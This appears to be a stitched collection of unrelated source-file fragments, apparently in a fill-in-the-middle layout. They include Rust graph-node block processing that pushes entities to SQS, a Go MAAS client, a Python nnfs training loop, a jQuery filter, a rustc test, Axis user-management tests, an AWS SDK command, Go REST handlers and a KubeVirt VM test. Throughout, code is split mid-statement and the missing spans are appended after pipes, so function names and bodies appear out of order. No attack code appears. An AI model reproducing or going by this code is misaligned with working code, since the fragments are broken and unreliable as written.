if let Some(proof_of_indexing) = proof_of_indexing {
let proof_of_indexing = Arc::try_unwrap(proof_of_indexing).unwrap().into_inner();
update_proof_of_indexing(
proof_of_indexing,
&self.ctx.host_metrics.stopwatch,
&self.inputs.deployment.hash,
&mut block_state.entity_cache,
)
.await?;
}
let section = self
.ctx
.host_metrics
.stopwatch
.start_section("as_modifications");
let ModificationsAndCache {
modifications: mut mods,
data_sources,
entity_lfu_cache: cache,
} = block_state
.entity_cache
.as_modifications()
.map_err(|e| BlockProcessingError::Unknown(e.into()))?;
section.end();
// Put the cache back in the ctx, asserting that the placeholder cache was not used.
assert!(self.ctx.state.entity_lfu_cache.is_empty());
self.ctx.state.entity_lfu_cache = cache;
if !mods.is_empty() {
info!(&logger, "Applying {} entity operation(s)", mods.len());
}
let err_count = block_state.deterministic_errors.len();
for (i, e) in block_state.deterministic_errors.iter().enumerate() {
let message = format!("{:#}", e).replace("\n", "\t");
error!(&logger, "Subgraph error {}/{}", i + 1, err_count;
"error" => message,
"code" => LogCode::SubgraphSyncingFailure
);
}
// Transact entity operations into the store and update the
// subgraph's block stream pointer
let _section = self
.ctx
.host_metrics
.stopwatch
.start_section("transact_block");
let stopwatch = self.ctx.host_metrics.stopwatch.clone();
let start = Instant::now();
let store = &self.inputs.store;
        // If a deterministic error has happened, make the PoI the only entity that will be stored.
if has_errors && !is_non_fatal_errors_active {
let is_poi_entity =
|entity_mod: &EntityModification| entity_mod.entity_key().entity_type.is_poi();
mods.retain(is_poi_entity);
// Confidence check
assert!(
mods.len() == 1,
"There should be only one PoI EntityModification"
);
}
let BlockState {
deterministic_errors,
..
} = block_state;
let first_error = deterministic_errors.first().cloned();
        // Send each entity modification to the SQS queue
let mut messages_sent = 0;
let mut messages_failed = 0;
for modification in &mods {
let mut entity = modification.get_entity();
let entity_key = modification.entity_key().clone();
entity.insert(String::from("entity_id"), Value::from(entity_key.entity_id));
let json_entity = serde_json::to_string(&entity).unwrap();
            let rsp = sqs_client
                .send_message()
                .queue_url("polysynth-test") // This is to read from the graph indices itself
                .message_body(json_entity)
                .send()
                .await;
match rsp {
Ok(_) => {
messages_sent += 1;
}
_ => {
messages_failed += 1;
}
}
}
println!("[PolySynth] #Total Success : {}, Failed: {}", messages_sent, messages_failed);
match store.transact_block_operations(
block_ptr,
firehose_cursor,
mods,
stopwatch,
data_sources,
deterministic_errors,
) {
Ok(_) => {
// For subgraphs with `nonFatalErrors` feature disabled, we consider
// any error as fatal.
//
// So we do an early return to make the subgraph stop processing blocks.
//
// In this scenario the only entity that is stored/transacted is the PoI,
// all of the others are discarded.
if has_errors && !is_non_fatal_errors_active {
// Only the first error is reported.
return Err(BlockProcessingError::Deterministic(first_error.unwrap()));
}
let elapsed = start.elapsed().as_secs_f64();
metrics.block_ops_transaction_duration.observe(elapsed);
// To prevent a buggy pending version from replacing a current version, if errors are
// present the subgraph will be unassigned.
if has_errors && !*DISABLE_FAIL_FAST && !store.is_deployment_synced().await? {
store
.unassign_subgraph()
.map_err(|e| BlockProcessingError::Unknown(e.into()))?;
                    // Use `Canceled` to avoid setting the subgraph health to failed; an error was
                    // just transacted, so it will already be set to unhealthy.
return Err(BlockProcessingError::Canceled);
}
Ok(needs_restart)
}
Err(e) => {
Err(anyhow!("Error while processing block stream for a subgraph: {}", e).into())
}
}
}
async fn process_triggers(
logger: &Logger,
mut block_state: BlockState<C>,
proof_of_indexing: &SharedProofOfIndexing,
subgraph_metrics: &Arc<SubgraphInstanceMetrics>,
instance: &SubgraphInstance<C, impl RuntimeHostBuilder<C>>,
block: &Arc<C::Block>,
triggers: Vec<C::TriggerData>,
causality_region: &str,
debug_fork: &Option<Arc<dyn SubgraphFork>>,
) -> Result<BlockState<C>, MappingError> {
use graph::blockchain::TriggerData;
for trigger in triggers {
block_state = instance
.process_trigger(
&logger,
block,
&trigger,
block_state,
proof_of_indexing,
causality_region,
debug_fork,
subgraph_metrics,
)
.await
.map_err(move |mut e| {
let error_context = trigger.error_context();
if !error_context.is_empty() {
e = e.context(error_context);
}
e.context("failed to process trigger".to_string())
})?;
}
Ok(block_state)
}
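    /// Instantiates the data sources created by the mappings in this block and
    /// builds a runtime host for each one.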
fn create_dynamic_data_sources(
&mut self,
logger: Logger,
host_metrics: Arc<HostMetrics>,
created_data_sources: Vec<DataSourceTemplateInfo<C>>,
) -> Result<(Vec<C::DataSource>, Vec<Arc<T::Host>>), Error> {
let mut data_sources = vec![];
let mut runtime_hosts = vec![];
for info in created_data_sources {
// Try to instantiate a data source from the template
let data_source = C::DataSource::try_from(info)?;
// Try to create a runtime host for the data source
let host = self.ctx.state.instance.add_dynamic_data_source(
&logger,
data_source.clone(),
self.inputs.templates.clone(),
host_metrics.clone(),
)?;
match host {
Some(host) => {
data_sources.push(data_source);
runtime_hosts.push(host);
}
None => {
fail_point!("error_on_duplicate_ds", |_| Err(anyhow!("duplicate ds")));
warn!(
logger,
"no runtime hosted created, there is already a runtime host instantiated for \
this data source";
"name" => &data_source.name(),
"address" => &data_source.address()
.map(|address| hex::encode(address))
.unwrap_or("none".to_string()),
)
}
}
}
Ok((data_sources, runtime_hosts))
}
fn persist_dynamic_data_sources(
&mut self,
logger: Logger,
entity_cache: &mut EntityCache,
data_sources: Vec<C::DataSource>,
) {
if !data_sources.is_empty() {
debug!(
logger,
"Creating {} dynamic data source(s)",
data_sources.len()
);
}
// Add entity operations to the block state in order to persist
// the dynamic data sources
for data_source in data_sources.iter() {
debug!(
logger,
"Persisting data_source";
"name" => &data_source.name(),
"address" => &data_source.address().map(|address| hex::encode(address)).unwrap_or("none".to_string()),
);
entity_cache.add_data_source(data_source);
}
// Merge filters from data sources into the block stream builder
self.ctx.state.filter.extend(data_sources.iter());
}
}
/// Transform the proof of indexing changes into entity updates that will be
/// inserted when as_modifications is called.
async fn update_proof_of_indexing(
proof_of_indexing: ProofOfIndexing,
stopwatch: &StopwatchMetrics,
deployment_id: &DeploymentHash,
entity_cache: &mut EntityCache,
) -> Result<(), Error> |
/// Checks if the deployment `BlockPtr` is at most one block behind the chain head.
fn is_deployment_synced(deployment_head_ptr: &BlockPtr, chain_head_ptr: Option<BlockPtr>) -> bool {
matches!((deployment_head_ptr, &chain_head_ptr), (b1, Some(b2)) if b1.number >= (b2.number - 1))
}
#[test]
fn test_is_deployment_synced() {
let block_0 = BlockPtr::try_from((
"bd34884280958002c51d3f7b5f853e6febeba33de0f40d15b0363006533c924f",
0,
))
.unwrap();
let block_1 = BlockPtr::try_from((
"8511fa04b64657581e3f00e14543c1d522d5d7e771b54aa3060b662ade47da13",
1,
))
.unwrap();
let block_2 = BlockPtr::try_from((
"b98fb783b49de5652097a989414c767824dff7e7fd765a63b493772511db81c1",
2,
))
.unwrap();
assert!(!is_deployment_synced(&block_0, None));
assert!(!is_deployment_synced(&block_2, None));
assert!(!is_deployment_synced(&block_0, Some(block_2.clone())));
assert!(is_deployment_synced(&block_1, Some(block_2.clone())));
assert!(is_deployment_synced(&block_2, Some(block_2.clone())));
}
| {
let _section_guard = stopwatch.start_section("update_proof_of_indexing");
let mut proof_of_indexing = proof_of_indexing.take();
for (causality_region, stream) in proof_of_indexing.drain() {
// Create the special POI entity key specific to this causality_region
let entity_key = EntityKey {
subgraph_id: deployment_id.clone(),
entity_type: POI_OBJECT.to_owned(),
entity_id: causality_region,
};
// Grab the current digest attribute on this entity
let prev_poi =
entity_cache
.get(&entity_key)
.map_err(Error::from)?
.map(|entity| match entity.get("digest") {
Some(Value::Bytes(b)) => b.clone(),
_ => panic!("Expected POI entity to have a digest and for it to be bytes"),
});
// Finish the POI stream, getting the new POI value.
let updated_proof_of_indexing = stream.pause(prev_poi.as_deref());
let updated_proof_of_indexing: Bytes = (&updated_proof_of_indexing[..]).into();
// Put this onto an entity with the same digest attribute
// that was expected before when reading.
let new_poi_entity = entity! {
id: entity_key.entity_id.clone(),
digest: updated_proof_of_indexing,
};
entity_cache.set(entity_key, new_poi_entity)?;
}
Ok(())
} |
subnet.go | package client
import (
"encoding/json"
"fmt"
"log"
"net/url"
"github.com/google/go-querystring/query"
"github.com/ionutbalutoiu/gomaasclient/entity"
"github.com/ionutbalutoiu/gomaasclient/entity/subnet"
)
type Subnet struct {
ApiClient ApiClient
}
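// client returns an API client scoped to the "subnets/{id}" endpoint.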
func (s *Subnet) client(id int) ApiClient {
return s.ApiClient.GetSubObject("subnets").GetSubObject(fmt.Sprintf("%v", id))
}
func (s *Subnet) Delete(id int) error {
return s.client(id).Delete()
}
func (s *Subnet) Get(id int) (subnet *entity.Subnet, err error) {
subnet = new(entity.Subnet)
err = s.client(id).Get("", url.Values{}, func(data []byte) error {
return json.Unmarshal(data, &subnet)
})
return
}
func (s *Subnet) GetIPAddresses(id int) (subnetIPAddresses []subnet.IPAddress, err error) {
qsp := url.Values{}
qsp.Set("with_username", "1")
qsp.Set("with_summary", "1")
err = s.client(id).Get("ip_addresses", qsp, func(data []byte) error {
return json.Unmarshal(data, &subnetIPAddresses)
})
return
}
func (s *Subnet) GetReservedIPRanges(id int) (subnetReservedIPRanges []subnet.ReservedIPRange, err error) {
err = s.client(id).Get("reserved_ip_ranges", url.Values{}, func(data []byte) error {
return json.Unmarshal(data, &subnetReservedIPRanges)
})
return
}
func (s *Subnet) GetStatistics(id int) (stats *subnet.Statistics, err error) {
stats = new(subnet.Statistics)
err = s.client(id).Get("statistics", url.Values{}, func(data []byte) error {
return json.Unmarshal(data, stats)
})
return
}
func (s *Subnet) GetUnreservedIPRanges(id int) (ipRanges []subnet.IPRange, err error) {
err = s.client(id).Get("unreserved_ip_ranges", url.Values{}, func(data []byte) error {
log.Printf("%s\n", data)
return json.Unmarshal(data, &ipRanges)
})
return
}
func (s *Subnet) Update(id int, params *entity.SubnetParams) (subnet *entity.Subnet, err error) { | }
subnet = new(entity.Subnet)
err = s.client(id).Put(qsp, func(data []byte) error {
return json.Unmarshal(data, subnet)
})
return
} | qsp, err := query.Values(params)
if err != nil {
return |
vertical.py | import matplotlib.pyplot as plt
import nnfs
from nnfs.datasets import vertical_data
nnfs.init()
X, y = vertical_data(samples=100, classes=3)
plt.scatter(X[:, 0], X[:, 1], c=y, s=40, cmap='brg')
plt.show()
import numpy as np
import nnfs
import matplotlib.pyplot as plt
nnfs.init()
class Layer_Dense:
def __init__(self, n_inputs, n_neurons):
self.weights = 0.01 * np.random.randn(n_inputs, n_neurons)
self.biases = np.zeros((1,n_neurons))
def forward(self, inputs):
self.output = np.dot(inputs, self.weights) + self.biases
class Activation_ReLU:
# Forward Pass
def forward(self, inputs):
self.output = np.maximum(0,inputs)
class Activation_Softmax:
def forward(self, inputs):
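        # Subtract the per-row max before exponentiating for numerical stability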
        exp_values = np.exp(inputs - np.max(inputs, axis=1, keepdims=True))
        normalized = exp_values / np.sum(exp_values, axis=1, keepdims=True)
        self.output = normalized
class Loss:
# Calculates the data and regularization losses
# given model output and ground truth values
def calculate(self, output, y):
# Calculate sample losses
sample_losses = self.forward(output, y)
# Calculate mean loss
data_loss = np.mean(sample_losses)
# Return loss
return data_loss
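# Cross-entropy loss for classification; expects probability outputs (e.g. from softmax) as y_pred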
class Loss_CategoricalCrossEntropy(Loss):
def | (self, y_pred, y_true):
# Number of Samples
samples = len(y_pred)
        # Clip data to prevent division by 0
        # Clip both sides to not drag the mean towards any value
        y_pred_clipped = np.clip(y_pred, 1e-7, 1 - 1e-7)
        # Probabilities for target values -
        # only if categorical labels
        if len(y_true.shape) == 1:
            correct_confidences = y_pred_clipped[range(samples), y_true]
        # Mask values - only for one-hot encoded labels
        elif len(y_true.shape) == 2:
            correct_confidences = np.sum(y_pred_clipped * y_true, axis=1)
        negative_log_likelihoods = -np.log(correct_confidences)
        return negative_log_likelihoods
# Model
dense1 = Layer_Dense(2,3)
activation1 = Activation_ReLU()
dense2 = Layer_Dense(3, 3)
activation2 = Activation_Softmax()
loss_function = Loss_CategoricalCrossEntropy()
# Helper variables
lowest_loss = 9999999 # some initial value
best_dense1_weights = dense1.weights.copy()
best_dense1_biases = dense1.biases.copy()
best_dense2_weights = dense2.weights.copy()
best_dense2_biases = dense2.biases.copy()
for iteration in range(10000):
# Generate a new set of weights for iteration
dense1.weights += 0.05 * np.random.randn(2, 3)
dense1.biases += 0.05 * np.random.randn(1, 3)
dense2.weights += 0.05 * np.random.randn(3, 3)
dense2.biases += 0.05 * np.random.randn(1, 3)
# Perform a forward pass of the training data through this layer
dense1.forward(X)
activation1.forward(dense1.output)
dense2.forward(activation1.output)
activation2.forward(dense2.output)
# Perform a forward pass through activation function
# it takes the output of second dense layer here and returns loss
loss = loss_function.calculate(activation2.output, y)
# Calculate accuracy from output of activation2 and targets
# calculate values along first axis
predictions = np.argmax(activation2.output, axis=1)
accuracy = np.mean(predictions==y)
# If loss is smaller - print and save weights and biases aside
if loss < lowest_loss:
print('New set of weights found, iteration:', iteration,
'loss:', loss, 'acc:', accuracy)
best_dense1_weights = dense1.weights.copy()
best_dense1_biases = dense1.biases.copy()
best_dense2_weights = dense2.weights.copy()
best_dense2_biases = dense2.biases.copy()
lowest_loss = loss
# Revert weights and biases
else:
dense1.weights = best_dense1_weights.copy()
dense1.biases = best_dense1_biases.copy()
dense2.weights = best_dense2_weights.copy()
dense2.biases = best_dense2_biases.copy() | forward |
index.ts | export * from './DividerMenuItem';
export * from './SelectorMenuItem';
export * from './TextMenuItem'; | ||
admin-contenttypes.js | (function($) {
$(function() {
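        // Filter the content type rows as the user types; Enter jumps to the first
        // visible match or to the create action with the typed text as a suggestion.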
$("#search-box").focus().on("keyup", function (e) {
var text = $(this).val();
if (e.keyCode == 13) {
var visibleRows = $("[data-record-text]:visible");
if (visibleRows.length > 0) { | var primaryButton = $("#layout-main .manage .primaryAction");
location.href = primaryButton.attr("href") + "?suggestion=" + text;
}
return;
}
if (text == "") {
$("[data-record-text]").show();
} else {
var lowerCaseText = text.toLowerCase();
$("[data-record-text]").each(function() {
var recordText = $(this).data("record-text").toLowerCase();
$(this).toggle(recordText.indexOf(lowerCaseText) >= 0);
});
}
});
$("#layout-main .manage .primaryAction").on("click", function(e) {
var suggestion = $("#search-box").val();
if (suggestion.length == 0) {
return;
}
location.href = $(this).attr("href") + "?suggestion=" + suggestion;
e.preventDefault();
});
});
})(jQuery); | var editLink = $(".related a:last", visibleRows[0]);
location.href = editLink.attr("href");
} else { |
hr-associated-type-bound-param-2.rs | trait Z<'a, T: ?Sized>
where
T: Z<'a, u16>,
//~^ the trait bound `str: Clone` is not satisfied
//~| the trait bound `str: Clone` is not satisfied
for<'b> <T as Z<'b, u16>>::W: Clone,
{
type W: ?Sized;
fn h(&self, x: &T::W) |
}
impl<'a> Z<'a, u16> for u16 {
type W = str;
//~^ ERROR the trait bound `str: Clone
}
fn main() {
1u16.h("abc");
}
| {
<T::W>::clone(x);
} |
test_pwdgrp_cgi.py | """Test Axis user management.
pytest --cov-report term-missing --cov=axis.pwdgrp_cgi tests/test_pwdgrp_cgi.py
"""
import pytest
from unittest.mock import Mock
from axis.pwdgrp_cgi import SGRP_ADMIN, User, Users
def test_users():
"""Verify that you can list users."""
mock_request = Mock()
users = Users(fixture, mock_request)
assert users['userv']
assert users['userv'].name == 'userv'
assert users['userv'].viewer
assert not users['userv'].operator
assert not users['userv'].admin
assert not users['userv'].ptz
assert users['usero']
assert users['usero'].name == 'usero'
assert users['usero'].viewer
assert users['usero'].operator
assert not users['usero'].admin
assert not users['usero'].ptz
assert users['usera']
assert users['usera'].name == 'usera'
assert users['usera'].viewer
assert users['usera'].operator
assert users['usera'].admin
assert users['usera'].ptz
def test_create():
"""Verify that you can create users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin'
})
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_modify():
"""Verify that you can modify users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.modify('joe', pwd='abcd')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd'
})
users.modify('joe', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'sgrp': 'viewer:operator:admin'
})
users.modify('joe', comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'comment': 'comment'
})
users.modify('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_delete():
"""Verify that you can delete users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.delete('joe')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'remove',
'user': 'joe'
})
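# Raw user/group listing (pwdgrp.cgi format) used as the fixture for the tests above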
fixture = """admin="usera,wwwa,wwwaop,wwwaovp,wwwao,wwwap,wwwaov,root"
anonymous=""
api-discovery=""
audio="streamer,sdk,audiocontrol"
basic-device-info=""
gpio="environment,actionengined,led,mediaclipcgi,iod,scheduled,ptzadm,"
operator="usera,usero,sdk,wwwo,wwwaovp,wwwaop,wwwao,wwwop,wwwaov,root"
ptz="usera,wwwop,wwwaop,wwwaovp,wwwap,wwwp,wwwovp,root,wwwvp,wwwavp"
users="userv,usero,usera"
viewer="usera,usero,sdk,wwwaovp,wwwaov,wwwov,wwwovp,wwwav,root,userv,wwwv" | """ | digusers="root,operator,viewer" |
DeleteTypedLinkFacetCommand.ts | import { CloudDirectoryClientResolvedConfig, ServiceInputTypes, ServiceOutputTypes } from "../CloudDirectoryClient";
import { DeleteTypedLinkFacetRequest, DeleteTypedLinkFacetResponse } from "../models/models_0";
import {
deserializeAws_restJson1DeleteTypedLinkFacetCommand,
serializeAws_restJson1DeleteTypedLinkFacetCommand,
} from "../protocols/Aws_restJson1";
import { getSerdePlugin } from "@aws-sdk/middleware-serde";
import { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from "@aws-sdk/protocol-http";
import { Command as $Command } from "@aws-sdk/smithy-client";
import {
FinalizeHandlerArguments,
Handler,
HandlerExecutionContext,
MiddlewareStack,
HttpHandlerOptions as __HttpHandlerOptions,
MetadataBearer as __MetadataBearer,
SerdeContext as __SerdeContext,
} from "@aws-sdk/types";
export type DeleteTypedLinkFacetCommandInput = DeleteTypedLinkFacetRequest;
export type DeleteTypedLinkFacetCommandOutput = DeleteTypedLinkFacetResponse & __MetadataBearer;
/**
* <p>Deletes a <a>TypedLinkFacet</a>. For more information, see <a href="https://docs.aws.amazon.com/clouddirectory/latest/developerguide/directory_objects_links.html#directory_objects_links_typedlink">Typed Links</a>.</p>
*/
export class DeleteTypedLinkFacetCommand extends $Command<
DeleteTypedLinkFacetCommandInput,
DeleteTypedLinkFacetCommandOutput,
CloudDirectoryClientResolvedConfig
> {
// Start section: command_properties
// End section: command_properties
constructor(readonly input: DeleteTypedLinkFacetCommandInput) {
// Start section: command_constructor
super();
// End section: command_constructor
}
/**
* @internal
*/
resolveMiddleware(
clientStack: MiddlewareStack<ServiceInputTypes, ServiceOutputTypes>,
configuration: CloudDirectoryClientResolvedConfig,
options?: __HttpHandlerOptions
): Handler<DeleteTypedLinkFacetCommandInput, DeleteTypedLinkFacetCommandOutput> {
this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize)); |
const stack = clientStack.concat(this.middlewareStack);
const { logger } = configuration;
const clientName = "CloudDirectoryClient";
const commandName = "DeleteTypedLinkFacetCommand";
const handlerExecutionContext: HandlerExecutionContext = {
logger,
clientName,
commandName,
inputFilterSensitiveLog: DeleteTypedLinkFacetRequest.filterSensitiveLog,
outputFilterSensitiveLog: DeleteTypedLinkFacetResponse.filterSensitiveLog,
};
const { requestHandler } = configuration;
return stack.resolve(
(request: FinalizeHandlerArguments<any>) =>
requestHandler.handle(request.request as __HttpRequest, options || {}),
handlerExecutionContext
);
}
private serialize(input: DeleteTypedLinkFacetCommandInput, context: __SerdeContext): Promise<__HttpRequest> {
return serializeAws_restJson1DeleteTypedLinkFacetCommand(input, context);
}
private deserialize(output: __HttpResponse, context: __SerdeContext): Promise<DeleteTypedLinkFacetCommandOutput> {
return deserializeAws_restJson1DeleteTypedLinkFacetCommand(output, context);
}
// Start section: command_body_extra
// End section: command_body_extra
} | |
main.go | package main
import (
"log"
"net/http"
"github.com/gin-gonic/gin"
"github.com/maxritter/aws-cdk-apprunner-vpc-golang/controllers"
"github.com/maxritter/aws-cdk-apprunner-vpc-golang/db"
"github.com/maxritter/aws-cdk-apprunner-vpc-golang/utils"
)
func main() {
log.Println("Getting secrets..")
rdsSecret := utils.GetSecret()
log.Println("Init DB connection..")
db.Init(rdsSecret)
log.Println("Starting server..")
r := gin.Default()
//HTTP Health Check
r.GET("/", func(c *gin.Context) {
c.String(http.StatusOK, "OK")
})
//REST API
v1 := r.Group("/api/v1")
{
tasks := v1.Group("/tasks")
{
tasks.GET("/", controllers.GetTasks)
tasks.POST("/", controllers.CreateTask) | tasks.DELETE("/:id", controllers.DeleteTask)
}
}
r.Run(":8080") // listen and serve on 0.0.0.0:8080
} | tasks.PUT("/:id", controllers.UpdateTask) |
position_test.go | package pos
import "testing"
var originPosition = Position{X: 0, Y: 0}
func TestNeighbors(t *testing.T) {
neighbors := originPosition.Neighbors()
if len(neighbors) != 8 {
t.Errorf("Position neighbors should contain 8 elems")
}
if positionsInclude(neighbors, originPosition) {
t.Errorf("Neighbors of a position should not include that position itself")
}
}
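// positionsInclude reports whether pos is present in positions.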
func | (positions []Position, pos Position) bool {
for _, elem := range positions {
if elem == pos {
return true
}
}
return false
}
| positionsInclude |
academicSessions.go | package handlers
import (
"github.com/fffnite/go-oneroster/ormodel"
"github.com/go-chi/render"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/mongo"
"net/http"
"time"
)
var asCols = []string{
"sourcedId",
"status",
"dateLastModified",
"title",
"startDate",
"endDate",
"type",
"parent",
"children",
"schoolYear",
}
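// GetAllAcademicSessions returns a handler that lists documents from the academicSessions collection.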
func GetAllAcademicSessions(client *mongo.Client) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
c := client.Database("oneroster").Collection("academicSessions")
res, errP := GetCollection(c, asCols, w, r)
out := struct {
Output []bson.M `json:"academicSessions,omitempty"`
ErrorPayload []error `json:"statusInfoSet,omitempty"`
}{res, errP}
render.JSON(w, r, out)
}
}
func GetAcademicSession(client *mongo.Client) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
c := client.Database("oneroster").Collection("academicSessions")
res, errP := GetDoc(c, asCols, w, r)
out := struct {
Output bson.M `json:"academicSession,omitempty"`
ErrorPayload []error `json:"statusInfoSet,omitempty"`
}{res, errP}
render.JSON(w, r, out)
}
}
func | (client *mongo.Client) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
c := client.Database("oneroster").Collection("academicSessions")
var data ormodel.AcademicSessions
data.DateLastModified = time.Now()
PutDoc(c, &data, w, r)
}
}
| PutAcademicSession |
create_release_notes.py | def create_release_notes():
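    """Copy the most recent release section of CHANGELOG.md into RELEASE_NOTES.md,
    reducing the heading level of its titles by one."""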
import os
path = os.path.dirname(os.path.abspath(__file__))
changelog_filename = os.path.join(path, "../CHANGELOG.md")
release_notes_filename = os.path.join(path, "../RELEASE_NOTES.md")
with open(changelog_filename, "r") as changelog:
with open(release_notes_filename, "w") as release_notes:
started = False
# Search top-most release notes
while not started:
line = changelog.readline()
if not line:
break
if line.startswith("## ["):
started = True
while started:
# reduce title indentation
if line.startswith("##"):
line = line[1:]
release_notes.write(line)
line = changelog.readline()
if not line or line.startswith("## ["):
break
if __name__ == "__main__":
| create_release_notes() |
|
error.rs | pub enum EnvironmentError {
UndefinedIdentifier(String),
}
impl std::fmt::Display for EnvironmentError {
fn | (&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
match *self {
EnvironmentError::UndefinedIdentifier(ref name) => {
write!(f, "Undefined variable {}", name)
}
}
}
}
| fmt |
vm_test.go | /*
* This file is part of the KubeVirt project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Copyright 2018 Red Hat, Inc.
*
*/
package tests_test
import (
"fmt"
"io/ioutil"
"net/http"
"os"
"regexp"
"strings"
"time"
expect "github.com/google/goexpect"
. "github.com/onsi/ginkgo"
"github.com/onsi/ginkgo/extensions/table"
. "github.com/onsi/gomega"
"github.com/pborman/uuid"
k8sv1 "k8s.io/api/core/v1"
v13 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/resource"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
v12 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/types"
"k8s.io/apimachinery/pkg/util/json"
v1 "kubevirt.io/client-go/api/v1"
"kubevirt.io/client-go/kubecli"
cdiv1 "kubevirt.io/containerized-data-importer/pkg/apis/core/v1alpha1"
"kubevirt.io/kubevirt/pkg/controller"
"kubevirt.io/kubevirt/pkg/virtctl/vm"
"kubevirt.io/kubevirt/tests"
)
var _ = Describe("[rfe_id:1177][crit:medium][vendor:[email protected]][level:component]VirtualMachine", func() {
tests.FlagParse()
virtClient, err := kubecli.GetKubevirtClient()
tests.PanicOnError(err)
runStrategyAlways := v1.RunStrategyAlways
runStrategyHalted := v1.RunStrategyHalted
BeforeEach(func() {
tests.BeforeTestCleanup()
})
Context("An invalid VirtualMachine given", func() {
It("[test_id:1518]should be rejected on POST", func() {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
template := tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n")
newVM := tests.NewRandomVirtualMachine(template, false)
jsonBytes, err := json.Marshal(newVM)
Expect(err).To(BeNil())
// change the name of a required field (like domain) so validation will fail
jsonString := strings.Replace(string(jsonBytes), "domain", "not-a-domain", -1)
result := virtClient.RestClient().Post().Resource("virtualmachines").Namespace(tests.NamespaceTestDefault).Body([]byte(jsonString)).SetHeader("Content-Type", "application/json").Do()
// Verify validation failed.
statusCode := 0
result.StatusCode(&statusCode)
Expect(statusCode).To(Equal(http.StatusUnprocessableEntity))
})
It("[test_id:1519]should reject POST if validation webhoook deems the spec is invalid", func() {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
template := tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n")
// Add a disk that doesn't map to a volume.
// This should get rejected which tells us the webhook validator is working.
template.Spec.Domain.Devices.Disks = append(template.Spec.Domain.Devices.Disks, v1.Disk{
Name: "testdisk",
})
newVM := tests.NewRandomVirtualMachine(template, false)
result := virtClient.RestClient().Post().Resource("virtualmachines").Namespace(tests.NamespaceTestDefault).Body(newVM).Do()
// Verify validation failed.
statusCode := 0
result.StatusCode(&statusCode)
Expect(statusCode).To(Equal(http.StatusUnprocessableEntity))
reviewResponse := &v12.Status{}
body, _ := result.Raw()
err = json.Unmarshal(body, reviewResponse)
Expect(err).To(BeNil())
Expect(len(reviewResponse.Details.Causes)).To(Equal(1))
Expect(reviewResponse.Details.Causes[0].Field).To(Equal("spec.template.spec.domain.devices.disks[2].name"))
})
It("should be rejected when VM template lists a DataVolume, but VM lists PVC VolumeSource", func() {
dv := tests.NewRandomDataVolumeWithHttpImport(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, k8sv1.ReadWriteOnce)
_, err := virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Create(dv)
Expect(err).To(BeNil())
defer func(dv *cdiv1.DataVolume) {
By("Deleting the DataVolume")
ExpectWithOffset(1, virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Delete(dv.Name, &metav1.DeleteOptions{})).To(Succeed())
}(dv)
tests.WaitForSuccessfulDataVolumeImport(dv, 60)
vmi := tests.NewRandomVMI()
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("64M")
diskName := "disk0"
bus := "virtio"
vmi.Spec.Domain.Devices.Disks = append(vmi.Spec.Domain.Devices.Disks, v1.Disk{
Name: diskName,
DiskDevice: v1.DiskDevice{
Disk: &v1.DiskTarget{
Bus: bus,
},
},
})
vmi.Spec.Volumes = append(vmi.Spec.Volumes, v1.Volume{
Name: diskName,
VolumeSource: v1.VolumeSource{
PersistentVolumeClaim: &k8sv1.PersistentVolumeClaimVolumeSource{
ClaimName: dv.ObjectMeta.Name,
},
},
})
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("512M")
vm := tests.NewRandomVirtualMachine(vmi, true)
vm.Spec.DataVolumeTemplates = append(vm.Spec.DataVolumeTemplates, *dv)
_, err = virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
